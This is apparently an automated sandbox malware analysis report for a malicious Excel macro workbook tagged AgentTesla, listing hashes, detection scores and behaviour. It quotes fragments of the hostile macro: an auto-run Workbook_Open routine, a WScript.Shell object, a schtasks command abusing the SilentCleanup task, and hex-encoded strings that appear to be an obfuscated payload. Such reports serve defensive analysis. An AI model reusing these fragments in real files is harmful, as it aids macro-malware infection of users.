Analysis Report Marine Tiger.xlsm

Overview

General Information

Sample Name: Marine Tiger.xlsm
Analysis ID: 349782
MD5: 18d6c58d438aa199c43cec6503ae2a6c
SHA1: f2dbad3686195f07db9bac1aa7eba45120069ded
SHA256: 6c92ed33934d5a604f57aac4ff33252720354285291791bed88b6f3f15b9631d
Tags: AgentTeslaexexlsm

Most interesting Screenshot:

Detection

Score: 80
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Document contains an embedded VBA macro which may execute processes
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)
Document contains an embedded VBA with hexadecimal encoded strings
Document exploit detected (process start blacklist hit)
Machine Learning detection for sample
Sigma detected: Microsoft Office Product Spawning Windows Shell
Uses schtasks.exe or at.exe to add and modify task schedules
Creates a process in suspended mode (likely to inject code)
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros

Classification

AV Detection:

barindex
Multi AV Scanner detection for submitted file
Source: Marine Tiger.xlsm Virustotal: Detection: 40% Perma Link
Source: Marine Tiger.xlsm ReversingLabs: Detection: 29%
Machine Learning detection for sample
Source: Marine Tiger.xlsm Joe Sandbox ML: detected

Compliance:

barindex
Uses new MSVCR Dlls
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior

Software Vulnerabilities:

barindex
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe Jump to behavior

System Summary:

barindex
Document contains an embedded VBA macro which may execute processes
Source: VBA code instrumentation OLE, VBA macro: Module ThisWorkbook, Function Workbook_Open, API IWshShell3.Run("cmd /c schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I") Name: Workbook_Open
Document contains an embedded VBA macro with suspicious strings
Source: Marine Tiger.xlsm OLE, VBA macro line: Set ghhfgfgdsfas = CreateObject("WScript.Shell")
Source: Marine Tiger.xlsm OLE, VBA macro line: Set ghhfgfgdsfas = CreateObject("WScript.Shell")
Source: Marine Tiger.xlsm OLE, VBA macro line: Set ghhfgfgdsfas = CreateObject("WScript.Shell")
Source: VBA code instrumentation OLE, VBA macro: Module ThisWorkbook, Function Workbook_Open, String wscript: Set ghhfgfgdsfas = CreateObject("WScript.Shell") Name: Workbook_Open
Source: VBA code instrumentation OLE, VBA macro: Module ThisWorkbook, Function Workbook_Open, String wscript: Set ghhfgfgdsfas = CreateObject("WScript.Shell") Name: Workbook_Open
Source: VBA code instrumentation OLE, VBA macro: Module ThisWorkbook, Function Workbook_Open, String wscript: Set ghhfgfgdsfas = CreateObject("WScript.Shell") Name: Workbook_Open
Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)
Source: Marine Tiger.xlsm Stream path 'VBA/ThisWorkbook' : found possibly 'WScript.Shell' functions regdelete, regwrite, run
Document contains an embedded VBA with hexadecimal encoded strings
Source: Marine Tiger.xlsm Stream path 'VBA/ThisWorkbook' : found hex strings
Source: VBA code instrumentation OLE, VBA macro: Module ThisWorkbook, Function Workbook_Open, String 545751656B4F615E5E515A606B615F515E68517A82757E7B7A79717A806883757A70757E
Source: VBA code instrumentation OLE, VBA macro: Module ThisWorkbook, Function Workbook_Open, String 6F79702C3B6F2C7C6A7B83717E7F746A71786A782C39832C3D2C4D707039597C5C7E7172717E717A6F712C3951846F78817F757B7A5C6D80742C2E30717A82466D7C7C706D806D2E475F806D7E80395F7871717C2C3D3E472C345A7183395B6E76716F802C5A71803A63716E4F7875717A80353A507B837A787B6D705275787134337480807C463B3B817A75807E6D7A7F74757C3A757A3B7C63725F417F5955457763757E51573A71847133383430717A82466D7C7C706D806D35373368607D5A6F4F3A6E6D803335475F806D7E80395F7871717C2C3E472C5F806D7E80395C7E7B6F717F7F2C30717A82466D7C7C706D806D68607D5A6F4F3A6E6D8047325E51592C33
Source: VBA code instrumentation OLE, VBA macro: Module ThisWorkbook, Function Workbook_Open, String 6F79702C3B6F2C7F6F74806D7F777F2C3B7E817A2C3B807A2C6859756F7E7B7F7B72806863757A707B837F6850757F774F78716D7A817C685F7578717A804F78716D7A817C2C3B55
Source: VBA code instrumentation OLE, VBA macro: Module ThisWorkbook, Function Workbook_Open, String 545751656B4F615E5E515A606B615F515E68517A82757E7B7A79717A806883757A70757E
Document contains an embedded VBA macro which executes code when the document is opened / closed
Source: Marine Tiger.xlsm OLE, VBA macro line: Public Sub Workbook_Open()
Source: VBA code instrumentation OLE, VBA macro: Module ThisWorkbook, Function Workbook_Open Name: Workbook_Open
Document contains embedded VBA macros
Source: Marine Tiger.xlsm OLE indicator, VBA macros: true
Source: classification engine Classification label: mal80.expl.winXLSM@5/1@0/0
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$Marine Tiger.xlsm Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRCE08.tmp Jump to behavior
Source: C:\Windows\System32\schtasks.exe Console Write: ................................E.R.R.O.R.:. ......................................v....)..v................................5................... Jump to behavior
Source: C:\Windows\System32\schtasks.exe Console Write: .................................................1.v......................;.............................................X.................;..... Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: Marine Tiger.xlsm Virustotal: Detection: 40%
Source: Marine Tiger.xlsm ReversingLabs: Detection: 29%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I
Source: unknown Process created: C:\Windows\System32\schtasks.exe schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior

Boot Survival:

barindex
Uses schtasks.exe or at.exe to add and modify task schedules
Source: unknown Process created: C:\Windows\System32\schtasks.exe schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I Jump to behavior
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 349782 Sample: Marine Tiger.xlsm Startdate: 08/02/2021 Architecture: WINDOWS Score: 80 17 Multi AV Scanner detection for submitted file 2->17 19 Machine Learning detection for sample 2->19 21 Document contains an embedded VBA with hexadecimal encoded strings 2->21 23 5 other signatures 2->23 7 EXCEL.EXE 11 12 2->7         started        process3 file4 15 C:\Users\user\Desktop\~$Marine Tiger.xlsm, data 7->15 dropped 25 Document exploit detected (process start blacklist hit) 7->25 11 cmd.exe 7->11         started        signatures5 process6 process7 13 schtasks.exe 11->13         started       
No contacted IP infos